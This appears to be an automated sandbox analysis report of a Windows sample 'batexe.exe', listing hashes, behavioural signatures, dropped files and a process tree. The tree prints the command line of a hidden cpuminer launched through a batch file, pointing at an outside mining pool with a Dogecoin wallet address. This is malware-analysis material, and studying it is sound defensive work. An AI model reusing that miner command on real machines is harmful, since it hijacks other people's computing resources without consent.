Analysis

  • max time kernel
    303s
  • max time network
    317s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    24/02/2024, 08:16

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 6 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Users\Admin\AppData\Local\Temp\9A47.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\9A47.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9A47.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4516
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEC9.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3136

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\9A47.tmp\b2e.exe

          Filesize

          2.6MB

          MD5

          a5e5df886b731a106be5ffdd55d5eba6

          SHA1

          49f0ee9c3161b956d8752bd7c4c5351bd2dc0fe6

          SHA256

          39d92aa54aff7dc78100a84d70011578f98cc2bc56d73853a24a1b39d77c26e7

          SHA512

          105723e9e49510157b696057447d2278e9bde945c3ab9882a6d364a2406b7080370e05849909f24bcd79f3ea6ec13fa100364d11a150f3b5a708e8762d49817f

        • C:\Users\Admin\AppData\Local\Temp\9A47.tmp\b2e.exe

          Filesize

          1.7MB

          MD5

          3345a03c3f4e07eae86262fff6200e00

          SHA1

          396bdca7e2532e312ddb1e15000a6b7dc07f70b2

          SHA256

          ec3d63df51202f9c285dd5e60cae82ef27c3ab52daad4f373a7546040129c153

          SHA512

          eb459f19f925e6884c4f4636ddb4e78957ba2872acaae8a1ba0f6bb658200351a76e8fc46c1ed87091d97c5db0212bcd623d3943b1ce91f1376142332784a4d6

        • C:\Users\Admin\AppData\Local\Temp\9A47.tmp\b2e.exe

          Filesize

          886KB

          MD5

          2a7b2e7777f11d790773b0618855396f

          SHA1

          42841ac2fb76156b44834361891df72a9d71afae

          SHA256

          a8e0c22c3745d0ce5a023ea2c016654932ddd703e9a2aa2a69e33e4f7c879115

          SHA512

          1b3464a1615fd4b0df3079460f011dff9a35393e909bfc85bb0ad3358d61b066cb4ec359e626670a7f8b8e899a5d279b68034eaff667933e881530b9f9867e42

        • C:\Users\Admin\AppData\Local\Temp\AEC9.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          79KB

          MD5

          c49828fd63047fa1f93ba100c87e7130

          SHA1

          c0d0f7b0caedd0eb946721294c779fb76ec5d088

          SHA256

          0af7dd9bc71b98984b56913b0b7197ca3c26c89fb934971d51863383503e5301

          SHA512

          6e838de2125a64f47fd5f60e9fcfaed3fdd18e0b3d57f1db560844dd4ca453d1a8650a30895051e91f0cfc99e810f75fd3729966e963cb7cd637319b818bd2dd

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          702KB

          MD5

          2055fdcabc854f55ab73ef33350ffb83

          SHA1

          0c5cd6e0a6e07a59c557130e7cb80362b96640db

          SHA256

          25848d89ff0cbebd32c3f44e469c43e428a611d7cda28f7091a10d043367d382

          SHA512

          d9aeb7b189b79204a0f84aa6d2d7fad33426b8b58d53207af43565921b055bd90cbbb31a55c20a0bb8c39ae339ccdc3b6bd506af2c1874a674857bf8fe23c1ba

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          600KB

          MD5

          c82e78f159efdbe179aa1fde40260220

          SHA1

          a6f89903f7020f222752ffa0c1901455e7d3674d

          SHA256

          62a3479c8680d1992456758e7331eb8530e45e5eb0097f046bb448da725f26c2

          SHA512

          d5823186f677a03916a828756f230852cd3a61ce23a6424bf6ab0e691df3f82257d57297dd6bf22fb12f3a1865e23482e4ba9166285781dd9118bc43190ede15

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          406KB

          MD5

          60259e55a13265e6ba45601f0ccc8b69

          SHA1

          543b0bb9d5ceb841a3208d5520717c18e218ba2b

          SHA256

          81071b9d0658e7122a11fbb7395d15069b950830b8a21dbf0d60415f80a83cc0

          SHA512

          6e95be1b78cd4cef21fcd91ea27ef9dffea28935f556a55a424bf6be8dcb74fe49949247d727f4e902980bd8829444bf7bd72c352a21ef94067323986cb19d96

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          528KB

          MD5

          e5451eea058efb14cecdb77acac4f34c

          SHA1

          da6eaa84a54ed3dd4e72d5faee31070c57d3c71c

          SHA256

          adf46398b2653a7e1c990c9f86463b817377c6782c37a011dea15e7d62585ce3

          SHA512

          6122f359dcc256ddae410c2159529a78174992171339c04efa2112f040871799ce6b203843133a905850988e158c4ec510f0cc834f3218280380e9aee0454def

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          60KB

          MD5

          b7ffee04099729b3119ceaa2645cf25e

          SHA1

          3b79c48537badf30cdfec9bf28efccd42b3edbed

          SHA256

          59a928e059e843c518447719f4642736c5658ff3e04de74eaf23926716f646ca

          SHA512

          713e4cfdcde358e90894f367221e877b567373a4e95193e4699b29de10aba57d8ef3675bddf01c6725ff050bfc5a55ff07b9dfd2630669607d3d16a9307b7481

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          1.0MB

          MD5

          2aea16c1219b8c558dff5a11d8d7fead

          SHA1

          939c783a8e778fec54a55578783f16d125bd8a9a

          SHA256

          a3d48a390a0867cb39fe7e00c9c0dee2bcf38df358556faa8b0b6435d95ffdb0

          SHA512

          e28f1dcd9ed13ef6313b0030c74843b4e969e54c29c14e413a085e8f65ee54631a4d69ca4a30603e5e38afd1bcb1c6ff29efbe2d7c8a63c99a6663c185bb951c

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          18KB

          MD5

          b120b83e4bee68e03df9d4f11590ece8

          SHA1

          3734ba145106fa6a0cbe23fd98c6b91b273949c2

          SHA256

          6416f3f80319fa54bded72fdb22a087d01346db0cd9ee435b7ee7f92acfe0bb8

          SHA512

          f8720884f50f780aaebc88a2d9e7d4ca7b4925dd0bd7899f4a2dc42b49fca00b4923dd0b89a419e866814079d0f9c1bfc219e7466e7d10920da0395f3d75f9c3

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          83KB

          MD5

          ecaf8372a9c80646be61322d12401af6

          SHA1

          68e9ffccd13b79c52227b9b580a7496d97ed1056

          SHA256

          cb24624605be5a761a1dec3b9f1e6bedbc2b045b1bb0ea82081c6629f9d7b39d

          SHA512

          bfc6b9a2ddb94ed5f96e61f923cdc5d9ee04af6a6ec46e525e03df2749f05ad22cb1cbdecbc338536ec4e70631f9a3041db495de5269e1f59ccf1eb5eee02ffa

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          49KB

          MD5

          a950bb205cb869d846210f19c7dc8ab6

          SHA1

          d9d0594469f8e3179dad1b09d007cf43f052da99

          SHA256

          0caf0fc8e61f4ac3ed29e87faf656f54e76e0eeabf60a305f3e8779ae2cdaf65

          SHA512

          16aee223d0e65e47790ba466cd3e52571b62cf7395d10b6efb6f2884837b692c476193815c860bc0e374f06e8a477cfa012697fa6affecd6759077dc4460c193

        • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          257KB

          MD5

          79e77d45277742877c93dab353ad8a2a

          SHA1

          8e0e97856ba56de7b2fe3a5c56ff850025b95b32

          SHA256

          b65669ff880fc745b5075019d186eba6507f85e65940dad3d668981206a4c963

          SHA512

          00e6e1e4bad84e67fa1c802ee08f4c8d887ec60233faebd135ff4c055268be6eedd43f1f45dcc2178955a406739b87af383c28fa5aa8af4a3b26af198d16b0bf

        • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          260KB

          MD5

          c7c89c3d15c15f89761b478e39edc554

          SHA1

          c73b1546c972fce2ea6abc5267b4e6be049d620f

          SHA256

          58788be3445fab62c936a347732e79273ca480b981a98cc5193cba78e3fd00f2

          SHA512

          26e998186a6e3aaa8314936fde68926a1aa182c91e39a55344c3a15691aaa2b937d0aeef98720c96509638e65f603139468e01f57c551f5b0e7dae89444fd912

        • memory/1032-7-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB

        • memory/3136-50-0x00000000744D0000-0x0000000074568000-memory.dmp

          Filesize

          608KB

        • memory/3136-56-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3136-46-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3136-47-0x000000006FC40000-0x00000000714F5000-memory.dmp

          Filesize

          24.7MB

        • memory/3136-43-0x0000000000870000-0x000000000092C000-memory.dmp

          Filesize

          752KB

        • memory/3136-49-0x0000000000870000-0x000000000092C000-memory.dmp

          Filesize

          752KB

        • memory/3136-48-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/3136-106-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3136-66-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3136-81-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3136-91-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3136-96-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3136-101-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4516-28-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB